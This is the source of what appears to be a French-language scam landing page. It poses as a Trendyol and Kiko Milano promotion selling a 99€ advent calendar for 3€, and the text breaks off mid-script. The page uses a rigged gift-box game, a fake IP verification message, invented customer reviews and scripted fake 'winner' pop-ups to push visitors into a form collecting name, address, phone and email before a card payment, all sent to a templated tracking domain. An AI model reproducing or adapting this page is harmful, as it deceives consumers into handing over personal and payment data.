<!DOCTYPE html>
<html lang="en">

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><!--<base href="/landers/60906/1676642706/">-->
	<base href=".">
	<!--<base href="/landers/59653/1675421895/">-->
	<!--<base href=".">-->
	<base href=".">

	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="shortcut icon" href="assets/favicon.png" type="image/png">
	<link rel="stylesheet" href="assets/box.css">
	<link rel="stylesheet" href="assets/metro-all.min.css">
	<link rel="stylesheet" href="assets/adapt.css">
	<link rel="stylesheet" href="assets/slick.css">
	<link rel="stylesheet" href="assets/client.css">
	<link rel="stylesheet" href="assets/mobile-order.css">
	<link rel="stylesheet" href="assets/ajax-mobile-master.css">
	<link rel="stylesheet" href="assets/main-product-content.css">
	<link rel="stylesheet" href="assets/comments.css">
	<link rel="stylesheet" href="assets/iconmoon.css">
	<link rel="stylesheet" href="assets/product-styles.css">
	<link rel="stylesheet" href="assets/style.css">

	<title>Calendrier de l'Avent "Holiday Première"</title>



	<style>
		body,
		html {
			overflow-x: hidden;
		}
	</style>

</head>

<body>
	<!-- class="page_one" -->
	<header class="header">
		<span id="logo" href="/" class="logo" title="trendyol"> <img style="height:45px;margin-bottom:-3px"
				src="./assets/logo.svg" alt="Trendyol"> </span>
		<div id="autoCompleteAppWrapper">
			<div data-fragment-name="AutoComplete" id="sfx-discovery-search-suggestions">
				<div class="mOkuL__p">
					<div class="N4M8bfaJ"><input data-testid="suggestion" type="text" class="V8wbcUhU" tabindex="1"
							autocomplete="off" maxlength="50" placeholder="Chercher..." value=""><i data-testid="search-icon"
							class="cyrzo7gC"></i></div>
				</div>
			</div>
		</div>
		<div id="accountNavigation">
			<div data-fragment-name="AccountNavigation" data-fragment-id="eb7428a4-6767-4b28-af4e-2e229860da38"
				data-gateway-service="prod-web-navigation-gateway">

				<div id="account-navigation-container">
					<div class="account-navigation-wrapper">
						<div class="account-nav-item user-login-container">
							<div class="link account-user">
								<div class="icon-container"><i class="i-user initial-icon"></i><i class="i-user-orange hover-icon"></i>
								</div>
								<p class="link-text">Accéder</p>
							</div>
						</div>
						<span class="account-nav-item account-favorites" href="">
							<div class="link">
								<div class="icon-container"><i class="i-heart initial-icon"></i><i
										class="i-heart-orange hover-icon"></i>
								</div>
								<p class="link-text">Préféré</p>
							</div>
						</span>
						<div class="account-nav-item basket-preview">
							<span class="link account-basket" href="/sepet">
								<div class="icon-container"><i class="i-bagg initial-icon"></i><i class="i-bagg-orange hover-icon"></i>
								</div>
								<p class="link-text">Panier</p>
							</span>
						</div>
					</div>
				</div>
			</div>
		</div>
	</header>
	<style>
		#autoCompleteAppWrapper {
			margin: 0 auto;
		}

		#accountNavigation {
			margin-left: auto;
		}

		.header {
			display: flex;
			width: 100%;
			height: 64px;
			align-items: center;
			justify-content: space-between;
			background-color: #000;
			margin: 0;
			margin-bottom: 15px;
			padding: 0 15px;
		}

		.header .header {
			margin: 0;
			padding: 0;
		}

		.logo {
			display: block;
			width: 150px;
			margin-left: 0;
		}

		.mOkuL__p {
			width: 598px;
			position: relative;
		}

		.mOkuL__p .N4M8bfaJ {
			display: -webkit-box;
			display: -ms-flexbox;
			display: flex;
		}

		.mOkuL__p .N4M8bfaJ .V8wbcUhU {
			-webkit-box-flex: 1;
			-ms-flex: 1;
			flex: 1;
			font-size: 14px;
			color: #333;
			background-color: #fff;
			border: 2px solid rgba(0, 0, 0, 0);
			border-radius: 6px;
			padding: 10px 40px 10px 15px;
			-webkit-box-sizing: border-box;
			box-sizing: border-box;
			outline: none;
			-webkit-transition: all ease .3s;
			transition: all ease .3s;
			line-height: 0;
		}

		.mOkuL__p .N4M8bfaJ .cyrzo7gC {
			width: 18px;
			height: 18px;
			position: absolute;
			right: 15px;
			bottom: calc(50% - 9px);
			cursor: pointer;
			background-image: url('data:image/svg+xml;charset=utf8, %3Csvg xmlns=%27http://www.w3.org/2000/svg%27 width=%2718%27 height=%2718%27 viewBox=%270 0 18 18%27%3E%3Cpath fill=%27%23F27A1A%27 d=%27M18.711 17.306l-4.684-4.703a7.49 7.49 0 0 0 1.864-4.932C15.891 3.441 12.327 0 7.946 0S0 3.441 0 7.671s3.565 7.671 7.946 7.671a8.056 8.056 0 0 0 4.552-1.388l4.72 4.74c.197.197.462.306.746.306.27 0 .525-.1.718-.28a.977.977 0 0 0 .03-1.414zM7.946 2.001c3.238 0 5.873 2.544 5.873 5.67 0 3.127-2.635 5.67-5.873 5.67-3.239 0-5.873-2.543-5.873-5.67 0-3.126 2.634-5.67 5.873-5.67z%27/%3E%3C/svg%3E');
			filter: brightness(0) saturate(100%) invert(0%) sepia(100%) saturate(0%) hue-rotate(284deg) brightness(96%) contrast(107%);
		}

		#account-navigation-container .account-navigation-wrapper {
			display: flex;
			justify-content: space-between;
			flex-direction: row;
			width: 250px;
		}

		#account-navigation-container .account-navigation-wrapper .link {
			margin: 0 !important;
			text-decoration: none !important;
			filter: brightness(0) saturate(100%) invert(93%) sepia(93%) saturate(29%) hue-rotate(210deg) brightness(107%) contrast(110%);
		}

		.account-navigation-container .account-navigation-wrapper .account-nav-item {
			display: flex;
		}

		#account-navigation-container .account-navigation-wrapper .link {
			text-decoration: none;
			display: flex;
			align-items: center;
			position: relative;
			height: 40px;
			font-family: Arial, Verdana, 'Roboto';
		}

		#account-navigation-container .account-navigation-wrapper .link .icon-container {
			position: relative;
			height: 18px;
			filter: brightness(0) saturate(100%) invert(100%) sepia(0%) saturate(0%) hue-rotate(156deg) brightness(104%) contrast(101%);
		}

		#account-navigation-container .account-navigation-wrapper .initial-icon,
		#account-navigation-container .account-navigation-wrapper .hover-icon {
			display: block;
			font-size: 16px;
			transition: opacity 0.4s ease;
		}

		#account-navigation-container .account-navigation-wrapper .hover-icon {
			opacity: 0;
			position: absolute;
			left: 0;
			top: 0;
			filter: brightness(0) saturate(100%) invert(100%) sepia(0%) saturate(0%) hue-rotate(156deg) brightness(104%) contrast(101%);
		}

		#account-navigation-container .account-navigation-wrapper .link .link-text {
			font-size: 14px;
			color: #fff !important;
			padding-left: 5px;
			margin-top: 2px;
			font-weight: 700;
			text-decoration: none !important;
			margin-bottom: 0;
			font-family: Arial, Verdana, 'Roboto';
		}

		.i-user-orange:before {
			content: "\e965";
			color: #fff;
			filter: brightness(0) saturate(100%) invert(100%) sepia(0%) saturate(0%) hue-rotate(156deg) brightness(104%) contrast(101%);
		}

		.i-heart-orange:before {
			content: "\e966";
			color: #fff;
		}

		.i-bagg-orange:before {
			content: "\e958";
			color: #fff;
		}

		@media(max-width: 1170px) {
			.mOkuL__p {
				width: 400px;
			}
		}

		@media(max-width: 992px) {
			.mOkuL__p {
				width: 200px;
			}
		}

		@media(max-width: 768px) {
			#account-navigation-container .account-navigation-wrapper .link .link-text {
				display: none;
			}

			#account-navigation-container .account-navigation-wrapper {
				width: auto;
			}

			#account-navigation-container .account-navigation-wrapper>div,
			#account-navigation-container .account-navigation-wrapper>a,
			#account-navigation-container .account-navigation-wrapper>span {
				margin-left: 15px;
			}
		}

		@media(max-width: 640px) {
			.mOkuL__p {
				display: none;
			}
		}
	</style>
	<section id="Check">
		<div class="conteiner">
			<div class="check_info">
				<h2>Vérifiez vos réponses.</h2>
				<div class="loading">
					<img src="assets/loading.png" alt="chargement">
				</div>
				<div class="verification_elements">
					<p class="time_one">Vous avez répondu à la question 3/3 !</p>
					<p class="time_two">Votre adresse IP ne montre aucune demande antérieure.</p>
					<p class="time_three">La réponse a été vérifiée.</p>
				</div>
			</div>
		</div>
	</section>

	<section id="game">
		<main id="boxes" class="page page__container">
			<div class="boxes" style="opacity: 1; display: grid; transition: all 1s ease 0s;">
				<div id="1" class="box tremor">
					<div class="box__inner"></div>
					<div class="box__front"></div>
				</div>
				<div id="2" class="box tremor">
					<div class="box__inner"></div>
					<div class="box__front"></div>
				</div>
				<div id="3" class="box tremor">
					<div class="box__inner"></div>
					<div class="box__front"></div>
				</div>
				<div id="4" class="box tremor">
					<div class="box__inner"></div>
					<div class="box__front"></div>
				</div>
				<div id="5" class="box tremor">
					<div class="box__inner"></div>
					<div class="box__front"></div>
				</div>
				<div id="6" class="box tremor">
					<div class="box__inner"></div>
					<div class="box__front"></div>
				</div>
			</div>
		</main>
	</section>

	<section>
		<div class="conteiner">
			<div class="wrapp_modal_box">
				<div class="img_box">
					<img src="assets/box-modal.png" alt="gift box">
				</div>
				<h2 class="Congratulations_person">Félicitations, vous avez vérifié avec succès que vous êtes une personne
					réelle !</h2>
				<ol>
					<li>Vous avez la chance de recevoir un <br><b>Calendrier de l'Avent "Holiday Première"</b> !</li>
					<li>Choisissez simplement le bon paquet-cadeau.</li>
					<li>Vous avez 3 essais, bonne chance !</li>
				</ol>
				<div class="link">
					<a class="click_me_pidor">OK</a>
				</div>

			</div>
		</div>
	</section>

	<section id="fonGrey">
		<div class="conteiner remove">
			<div class="two_modal_icon">
				<ol>
					<li class="topOHH">OHHH...</li>
					<li class="topOHHBot">Nous sommes désolés, mais cette boîte est vide ! Il vous reste (2) tentatives.</li>
				</ol>
				<div class="dfd">
					<a class="clickKlos click_me_pidor">OK</a>
				</div>

			</div>
		</div>


	</section>
	<div class="conteiner">
		<div class="img_gift_wind">
			<img class="pop" src="assets/giftModal.png" alt="Gift">
		</div>
	</div>
	<section>
		<div class="conteiner">
			<div class="two_modal_icon_Two">
				<div class="checkmarkTwo">
					<img src="assets/giftModal.png" alt="chekmark">
				</div>
				<h2 class="lastCong">Félicitations ! Vous avez gagné un <b>Calendrier de l'Avent "Holiday Première"</b>.</h2>
				<ol class="margLastL">
					<li>1. Cliquez sur "OK" et accédez à la page de livraison.</li>
					<li>2. Remplissez le formulaire et effectuez le paiement pour recevoir l'<br><b>Calendrier de l'Avent "Holiday
							Première"</b>.</li>
					<li>3. Le colis sera livré dans un délai de 5 à 7 jours.</li>
				</ol>
				<div class="nvnvmdlsl">
					<a class="clickKlos js-pickup" href="">Ok</a>
				</div>

			</div>
		</div>
	</section>
	<section id="page_two">
		<div class="conteiner">
			<div class="main-product-content">
				<div class="main-product-wrp">
					<div class="main-roduct-slider-for">
						<div class="main-roduct-slider-for__item">
							<img src="assets/product1.jpg" alt="" class="main-roduct-slider-for__image">
						</div>
						<div class="main-roduct-slider-for__item">
							<img src="assets/product2.jpg" alt="" class="main-roduct-slider-for__image">
						</div>
					</div>
					<div class="main-product-slider-nav">
						<div class="main-product-slider-nav__item">
							<img src="assets/product1.jpg" alt="" class="main-product-slider-nav__image">
						</div>
						<div class="main-product-slider-nav__item">
							<img src="assets/product2.jpg" alt="" class="main-product-slider-nav__image">
						</div>
					</div>
				</div>
				<div class="main-product-info">
					<h1 class="main-product-info__title">Calendrier de l'Avent "Holiday Première"</h1>
					<div class="prices-block">
						<span class="prices-block__old">99€
						</span>
						<span class="prices-block__new">3€</span>
					</div>
					<div class="text-block">
						<p class="text-block__paragraph">De rien !</p>
						<p class="text-block__paragraph">Vous avez participé à la promotion de Kiko Milano : vous avez la
							possibilité d'acheter un <b>Calendrier de l'Avent "Holiday Première"</b> pour seulement <b>3 € !</b>
						</p>
						<p class="text-block__paragraph">Pour bénéficier de votre remise personnalisée, répondez à quelques
							questions :</p>
					</div>
					<div class="block_questions">
						<div class="question first_question">
							<p><span>Question 1 sur 3 :</span> Avez-vous déjà utilisé des produits de Kiko Milano ?</p>
							<div class="answer">
								<a onclick="visiblQuestionOne()">Oui</a>
								<a onclick="visiblQuestionOne()">Non</a>
							</div>
						</div>
						<div class="question two_question">
							<p><span>Question 2 sur 3 :</span> Utilisez-vous fréquemment des produits de soin pour la peau ?</p>
							<div class="answer">
								<a onclick="visiblQuestionTwo()">Souvent</a>
								<a onclick="visiblQuestionTwo()">Rarement</a>
							</div>
						</div>
						<div class="question three_question">
							<p><span>Question 3 sur 3 :</span> Pour qui allez-vous acheter ce calendrier de l'Avent ?</p>
							<div class="answer">
								<a onclick="visiblPageTwo()">Pour moi</a>
								<a onclick="visiblPageTwo()">Pour un ami</a>
								<a onclick="visiblPageTwo()">Pour un membre de ma famille</a>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</section>
	<section class="section comments" id="comments_display_one">
		<div class=" conteiner">
			<div class="comments-rating-block">
				<div class="comments-rating-block__image-wrp">
					<img src="./assets/logo2.svg" alt="" class="comments-rating-block__image">
				</div>
				<span class="comments-rating-block__text">Commentaires sur cette action</span>
				<div class="comments-rating">
					<ul class="comments-rating-list">
						<li class="comments-rating-list__item star-fill"></li>
						<li class="comments-rating-list__item star-fill"></li>
						<li class="comments-rating-list__item star-fill"></li>
						<li class="comments-rating-list__item star-fill"></li>
						<li class="comments-rating-list__item star-fill"></li>
					</ul>
					<span class="comments-rating__value">4.91</span>
				</div>

			</div>
			<ul class="comments__list">
				<li class="comments__item" id="u1">
					<div class="comments__wrapper">
						<div class="comments__prop">
							<div class="comments__rating-wrapper">
								<ul class="comments__rating">
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
								</ul>
							</div>
							<p class="comments__username">Élise Lambert</p>
							<p class="comments__date-wrapper"><span class="comments__date">il y a 2 jours</span><span
									class="comments__reviewed"> </span></p>
						</div>
						<p class="comments__text">J'ai acheté ce calendrier et je pense que cela en valait la peine. Vous devez
							absolument être un fan de Kiko Milano ❤️</p>
						<div class="comments__model-block">
							<img src="./assets/product1.jpg" alt="" class="comments__model-image">
							<span class="comments__model-name">(MR530SG)</span>
						</div>
					</div>
				</li>
				<li class="comments__item" id="u2">
					<div class="comments__wrapper">
						<div class="comments__prop">
							<div class="comments__rating-wrapper">
								<ul class="comments__rating">
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
								</ul>
							</div>
							<p class="comments__username">Juliette Dubois</p>
							<p class="comments__date-wrapper"><span class="comments__date">il y a 2 jours</span><span
									class="comments__reviewed"> </span></p>
						</div>
						<p class="comments__text">Quel magnifique calendrier. J'en ai récemment acheté un, je le recommande
							vivement.</p>
						<div class="comments__model-block">
							<img src="./assets/product1.jpg" alt="" class="comments__model-image">
							<span class="comments__model-name">(MR530SG)</span>
						</div>
					</div>
				</li>
				<li class="comments__item" id="u3">
					<div class="comments__wrapper">
						<div class="comments__prop">
							<div class="comments__rating-wrapper">
								<ul class="comments__rating">
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
								</ul>
							</div>
							<p class="comments__username">Camille Moreau</p>
							<p class="comments__date-wrapper"><span class="comments__date">il y a 3 jours</span><span
									class="comments__reviewed"> </span></p>
						</div>
						<p class="comments__text">J'adore ce calendrier 💜</p>
						<div class="comments__model-block">
							<img src="./assets/product1.jpg" alt="" class="comments__model-image">
							<span class="comments__model-name">(MR530SG)</span>
						</div>
					</div>
				</li>
				<li class="comments__item" id="u4">
					<div class="comments__wrapper">
						<div class="comments__prop">
							<div class="comments__rating-wrapper">
								<ul class="comments__rating">
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
								</ul>
							</div>
							<p class="comments__username">Amélie Lefèvre</p>
							<p class="comments__date-wrapper"><span class="comments__date">il y a 3 jours</span><span
									class="comments__reviewed"> </span></p>
						</div>
						<p class="comments__text">Un calendrier de l'Avent contenant tout le nécessaire pour prendre soin de la
							peau.</p>
						<div class="comments__model-block">
							<img src="./assets/product1.jpg" alt="" class="comments__model-image">
							<span class="comments__model-name">(MR530SMT)</span>
						</div>
					</div>
				</li>
				<li class="comments__item" id="u5">
					<div class="comments__wrapper">
						<div class="comments__prop">
							<div class="comments__rating-wrapper">
								<ul class="comments__rating">
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
									<li class="star-fill"></li>
								</ul>
							</div>
							<p class="comments__username">Isabelle Martin</p>
							<p class="comments__date-wrapper"><span class="comments__date">il y a 4 jours</span><span
									class="comments__reviewed"> </span></p>
						</div>
						<p class="comments__text">Les calendriers de l'Avent de Kiko sont mes préférés. Je n'arrive pas à croire que
							j'en ai gagné un !</p>
						<div class="comments__model-block">
							<img src="./assets/product1.jpg" alt="" class="comments__model-image">
							<span class="comments__model-name">(MR530SG)</span>
						</div>
					</div>
				</li>
			</ul>
		</div>

	</section>

	<section class="order-data-wrp hidden">
		<div class="conteiner">
			<div class="cart-content">
				<div class="basket-steps">
					<a href="#" class="step done step-1">
						<div class="circle step-1"><span class="content"></span></div>
						<div class="title">Lotería</div>
					</a>
					<a href="#" class="step current step-2">
						<div class="circle step-2"><span class="content"></span></div>
						<div class="title">Detalles del pedido</div>
					</a>
					<a href="#" class="step step-3">
						<div class="circle step-3"><span class="content"></span></div>
						<div class="title">Pagar</div>
					</a>
				</div>
			</div>
			<div class="basket-tab">
				<div class="order-form-wrp">
					<div class="order-form-left-side">
						<form class="cart-form" action="https://{trackingdomain}/click/">
							<input type="hidden" name="fbpixel" value="{lander.param:fbpixel}" />
							<input type="hidden" name="origin" value="{origin}" />
							<input id="countryCodeHiddenField" type="hidden" name="country_code" value="+33">
							<div class="order-form-item">
								<span class="order-form-item__name">Livraison</span>
								<div class="order-form-item__fields">
									<div class="form-group">
										<label>Ville</label>
										<div class="input mt-1"><input name="city" class="" type="text" data-role="input"
												data-validate="custom=validateNameFamily" data-role-input="true" required>
											<div class="button-group"><button class="button input-clear-button" tabindex="-1"
													type="button"><span class="default-icon-cross"></span></button></div>
										</div>
									</div>
									<div class="form-group">
										<label>Adresse</label>
										<div class="input mt-1"><input name="address" class="" type="text" data-role="input"
												data-validate="custom=validateNameFamily" data-role-input="true" required>
											<div class="button-group"><button class="button input-clear-button" tabindex="-1"
													type="button"><span class="default-icon-cross"></span></button></div>
										</div>
									</div>
									<div class="form-group">
										<label>Code postal ou ZIP</label>
										<div class="input mt-1"><input name="zip" class="" type="text" data-role="input"
												data-validate="minlength=4" data-role-input="true" required>
											<div class="button-group"><button class="button input-clear-button" tabindex="-1"
													type="button"><span class="default-icon-cross"></span></button></div>
										</div>
									</div>
								</div>
							</div>
							<div class="order-form-item">
								<span class="order-form-item__name">Options de paiement</span>
								<div class="order-form-item__fields">
									<label class="basic-checkbox">
										<input type="radio" class="basic-checkbox__input" id="agreement__1" checked>
										<span class="basic-checkbox__style"></span>
										<p class="basic-checkbox__text">Payer par carte en ligne</p>
									</label>
									<style>
										.basic-checkbox {
											width: 100%;
											position: relative !important;
											left: 0;
											top: 0;
											float: left;
											width: 100%;
											white-space: inherit !important;
											opacity: 1 !important;
										}

										.basic-checkbox__input {
											position: absolute;
											width: 100%;
											height: 100%;
											opacity: 0;
											margin: 0 !important;
											cursor: pointer;
											z-index: 30;
										}

										.basic-checkbox__style {
											width: 15px;
											height: 15px;
											border: 1px solid #000;
											position: relative;
											float: left;
											border-radius: 50%;
											overflow: hidden;
										}

										.basic-checkbox__text {
											width: calc(100% - 15px);
											padding-left: 10px;
											font-size: 14px;
											line-height: 16px;
											margin: 0 !important;
											float: left;
										}

										.basic-checkbox__input:checked+.basic-checkbox__style:before {
											content: '';
											display: block;
											float: left;
											width: 10px;
											height: 10px;
											position: absolute;
											left: 50%;
											top: 50%;
											transform: translate(-50%, -50%);
											background-color: #000;
											border-radius: 50%;
											overflow: hidden;
										}
									</style>
								</div>
							</div>
							<div class="order-form-item">
								<span class="order-form-item__name">Informations personnelles</span>
								<div class="order-form-item__fields">
									<div class="form-group">
										<label>Prénom</label>
										<div class="input mt-1"><input name="name" class="" type="text" data-role="input"
												data-validate="minlength=8" data-role-input="true" required>
											<div class="button-group"><button class="button input-clear-button" tabindex="-1"
													type="button"><span class="default-icon-cross"></span></button></div>
										</div>
									</div>
									<div class="form-group">
										<label>Nom de famille</label>
										<div class="input mt-1"><input name="family" class="" type="text" data-role="input"
												data-validate="minlength=8" data-role-input="true" required>
											<div class="button-group"><button class="button input-clear-button" tabindex="-1"
													type="button"><span class="default-icon-cross"></span></button></div>
										</div>
									</div>
									<div class="form-group">
										<label>Numéro de téléphone</label>
										<div class="input country-input mt-1">
											<span class="country-input__value">+33</span>
											<input id="phoneInput" class="js-phone-input" class="" type="text" data-role="input"
												data-validate="minlength=9" data-role-input="true" required name="phone">
											<div class="button-group">
												<button class="button input-clear-button" tabindex="-1" type="button"><span
														class="default-icon-cross"></span></button>
											</div>
										</div>
										<style>
											.country-input {
												position: relative;
											}

											.country-input__value {
												position: absolute;
												left: -5px;
												top: 13.5px;
												padding-left: 3rem;
												font-size: 1rem;
											}

											.country-input__value:before {
												content: '';
												display: block;
												position: absolute;
												left: 0.75rem;
												top: 50%;
												transform: translateY(-50%);
												float: left;
												width: 1.8rem;
												height: 1rem;
												background: url('./assets/flag.png') no-repeat;
												background-size: 100% 100%;
											}

											.js-phone-input {
												padding-left: 4.6rem !important;
											}
										</style>
									</div>
									<div class="form-group">
										<label>E-Mail</label>
										<div class="input"><input name="email" type="text" data-role="input" data-validate="email"
												data-role-input="true" class="js-email-input" required>
											<div class="button-group"><button class="button input-clear-button" tabindex="-1"
													type="button"><span class="default-icon-cross"></span></button></div>
										</div>
									</div>
								</div>
							</div>
							<div class="buttons" style="width: 100%;">
								<button class="order-footer__button-next btn normal js-submit-button" type="submit">
									Aller à la caisse
								</button>
								<style>
									.js-submit-button.disable {
										opacity: 0.3;
										pointer-events: none;
									}
								</style>
							</div>
						</form>
					</div>
					<div class="order-form-right-side">
						<div class="order-item">
							<div class="order-item__image-wrp">
								<img src="./assets/product2.jpg" alt="" class="order-item__image">
							</div>
							<div class="order-item__descript">
								<span class="order-item__name">Calendrier de l'Avent "Holiday Première"</span>
								<div class="order-item__price-row">
									<span class="order-item__old-price">99€</span>
									<span class="order-item__new-price">3€</span>
								</div>
							</div>
						</div>
						<div class="order-details-list-wrp">
							<span class="order-details-list-wrp__name">Detalles del pedido</span>
							<ul class="order-details-list">
								<li class="order-details-list__item">
									<span class="order-details-list__name">Precio del pedido</span>
									<span class="order-details-list__value">3€</span>
								</li>
								<li class="order-details-list__item">
									<span class="order-details-list__name">Entrega</span>
									<span class="order-details-list__value">0€</span>
								</li>
								<li class="order-details-list__item all">
									<span class="order-details-list__name">Total</span>
									<span class="order-details-list__value">3€</span>
								</li>
							</ul>
						</div>
					</div>
				</div>
			</div>
		</div>
	</section>

	<div class="loader-wrp">
		<div class="loader-block">
			<img src="./assets/loader.gif" alt="" class="loader-block__image">
		</div>
	</div>

	<div class="loaded-images"
		style="width: 0; height: 0; opacity: 0; pointer-events: none; z-index: -1; float: left; overflow: hidden;">
		<img src="./assets/box-lid-ios.png" alt="">
		<img src="./assets/box.png" alt="">
		<img src="./assets/box-inner.png" alt="">
		<img src="./assets/box-inner-gift.png" alt="">
	</div>


	<script src="assets/jquery-3.2.1.min.js"></script>
	<script src="assets/slick.js"></script>
	<script src="assets/game.js"></script>
	<script src="assets/slider_scripts.js"></script>
	<script src="assets/main.js"></script>
	<div class="root" id="root"></div>

	<style>
		.root {
			position: fixed;
			right: 10px;
			top: 10px;
			z-index: 9999;
		}

		.notification {
			box-shadow: 0 1px 10px 0 rgb(0 0 0 / 10%), 0 2px 15px 0 rgb(0 0 0 / 5%);
			position: relative;
			min-height: 64px;
			max-height: 800px;
			cursor: pointer;
			font-family: sans-serif;
			overflow: hidden;
			z-index: 9999;
			margin-bottom: 1rem;
			border-radius: 4px;
			width: 310px;
			-webkit-user-select: none;
			-moz-user-select: none;
			-ms-user-select: none;
			user-select: none;
			background-color: #fff;
		}

		.notification_showed {
			animation-name: showNoty;
			animation-duration: 1.5s;
			animation-timing-function: linear;
			-webkit-animation-name: showNoty;
			-webkit-animation-duration: 1.5s;
			-webkit-animation-timing-function: linear;
		}

		.notification_hidden {
			animation-name: hiddenNoty;
			animation-duration: 1.5s;
			animation-timing-function: linear;
			-webkit-animation-name: hiddenNoty;
			-webkit-animation-duration: 1.5s;
			-webkit-animation-timing-function: linear;
		}

		.notification__wrapper {
			padding: 12px 6px;
			display: flex;
			align-items: flex-start;
		}

		.notification__body {
			display: flex;
			align-items: center;
			margin-right: 6px;
			padding-left: 6px;
		}

		.notification__img {
			width: 3.25rem;
			flex-shrink: 0;
			margin: 0 auto;
		}

		.notification__info {
			margin-left: 12px;
		}

		.notification__title {
			font-size: 1.1rem;
			font-weight: 500;
			color: rgb(19, 64, 148);
		}

		.notification__subtitle {
			font-weight: 400;
			font-size: 0.875rem;
			color: rgb(0, 0, 0);
			padding-bottom: 0.25rem;
		}

		.notification__subtitle:last-child {
			padding-bottom: 0;
		}

		.notification__close {
			background-color: transparent;
			border: none;
			cursor: pointer;
			opacity: 0.3;
		}

		.notification__closeIcon {
			width: 14px;
			height: 16px;
		}

		.notification__checkmark {
			width: 100%;
			max-width: 1.25rem;
			margin-left: 0.5rem;
			height: 15px;
		}

		.notification__city {
			text-decoration: underline;
		}

		@-webkit-keyframes showNoty {
			0% {
				opacity: 0;
			}

			50% {
				opacity: 0.5;
			}

			100% {
				opacity: 1;
			}
		}

		@keyframes showNoty {
			0% {
				opacity: 0;
			}

			50% {
				opacity: 0.5;
			}

			100% {
				opacity: 1;
			}
		}

		@-webkit-keyframes hiddenNoty {
			0% {
				opacity: 1;
			}

			50% {
				opacity: 0.5;
			}

			100% {
				opacity: 0;
			}
		}

		@keyframes hiddenNoty {
			0% {
				opacity: 1;
			}

			50% {
				opacity: 0.5;
			}

			100% {
				opacity: 0;
			}
		}
	</style>

	<script>
		class Notify {
			constructor(i) {
				(this.lang = {
					from: "it",
				}),
					(this.container = document.querySelector(".root")),
					(this.items = document.createElement("div")),
					this.items.classList.add("notifications"),
					this.container.appendChild(this.items);
			}

			create({ name: i, address: t, desc: e, img: n }) {
				const getRandomNumber = (min, max) => {
					return Math.round(Math.random() * (max - min) + min);
				};

				const o = `\n

      <div class="notification__wrapper">\n

        <div class="notification__body">\n

          <img class="notification__img" src="${n}" />\n



          <div class="notification__info">\n

            <div class="notification__subtitle">\n

              <b class="notification__name">${i}</b> depuis\n

              <span class="notification__city">${t}</span>\n

            </div>\n

            <div class="notification__title">\n

							gagné ${e}\n

            </div>\n

            <div class="notification__subtitle">\n

              <span>${getRandomNumber(10, 59)} il y a quelques instants</span>\n

            </div>\n

          </div>\n

        </div>\n

      </div>\n`,
					a = document.createElement("div");

				return (
					a.classList.add("notification", "notification_showed"),
					(a.innerHTML = o),
					a.addEventListener("click", (i) => i.currentTarget.remove()),
					a
				);
			}

			send(i) {
				const t = this.create(i);

				return this.items.prepend(t), t;
			}

			hide(i) {
				setTimeout(() => {
					i.classList.remove("notification_showed"),
						i.classList.add("notification_hidden"),
						setTimeout(() => {
							i.remove();
						}, 1500);
				}, 7500);
			}
		}

		const prodImg = "./assets/product2.jpg";

		const prodName = "Calendrier de l'Avent Holiday Première";

		const data = [
			{
				name: "Élise Lambert",

				address: "France",

				desc: `${prodName}`,

				img: `${prodImg}`,
			},

			{
				name: "Juliette Dubois",

				address: "France",

				desc: `${prodName}`,

				img: `${prodImg}`,
			},

			{
				name: "Camille Moreau",

				address: "France",

				desc: `${prodName}`,

				img: `${prodImg}`,
			},

			{
				name: "Amélie Lefèvre",

				address: "France",

				desc: `${prodName}`,

				img: `${prodImg}`,
			},

			{
				name: "Isabelle Martin",

				address: "France",

				desc: `${prodName}`,

				img: `${prodImg}`,
			},
		],
			notify = new Notify(".notifications"),
			timer = (i) =>
				new Promise((t, e) => {
					setTimeout(() => t(), i);
				}),
			random = (i, t) => Math.round(i + Math.random() * (t - i)),
			timeoutMs = 2e4;

		data.forEach((i, t) => {
			var e;

			((e = t ? (6e4, 18e4, Math.round(6e4 + 12e4 * Math.random())) : 2e4),
				new Promise((i, t) => {
					setTimeout(() => i(), e);
				})).then(() => {
					const t = notify.send(i);

					notify.hide(t);
				});
		});
	</script>

	<script>
		$('.input-clear-button').click(function (e) {
			e.preventDefault();
			$(this).closest('.form-group').find('input').val('');
			$(this).closest('.form-group').find('.input').removeClass('valid');
			$(this).closest('.form-group').find('.input').removeClass('invalid');
		});

		$(".form-group input").keyup(function () {
			let chabgedInput = $(this);
			let chabgedInputValue = chabgedInput.val();
			if (chabgedInputValue.length >= 1) {
				chabgedInput.closest('.input').addClass('valid');
			} else {
				chabgedInput.closest('.input').removeClass('valid');
				chabgedInput.closest('.input').addClass('invalid');
			}
			if (chabgedInputValue.length < 1) {
				chabgedInput.closest('.input').removeClass('valid');
				chabgedInput.closest('.input').removeClass('invalid');
			}
			validate()
		});


		$(".js-phone-input").keypress(function (event) {
			event = event || window.event;
			if (event.charCode && event.charCode != 0 && event.charCode != 46 && (event.charCode < 48 || event.charCode > 57))
				return false;
		});

		function validateEmail(email) {
			var re = /[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/;
			return re.test(String(email).toLowerCase());
		}

		function validate() {
			var email = $(".js-email-input").val();
			if (validateEmail(email)) {
				$(".js-email-input").closest('.form-group').find('.input').addClass('valid');
			} else {
				$(".js-email-input").closest('.form-group').find('.input').removeClass('valid');
				$(".js-email-input").closest('.form-group').find('.input').addClass('invalid');
			}
			return false;
		}

		$('.js-pickup').click(function (e) {
			e.preventDefault();
			$('#page_box').hide();
			$('.two_modal_icon_Two').hide();
			$('.order-data-wrp').show();
		});

		$('#agreement__1').click(function (e) {
			if ($(this).prop('checked')) {
				$('.js-submit-button').removeClass('disable');
			} else {
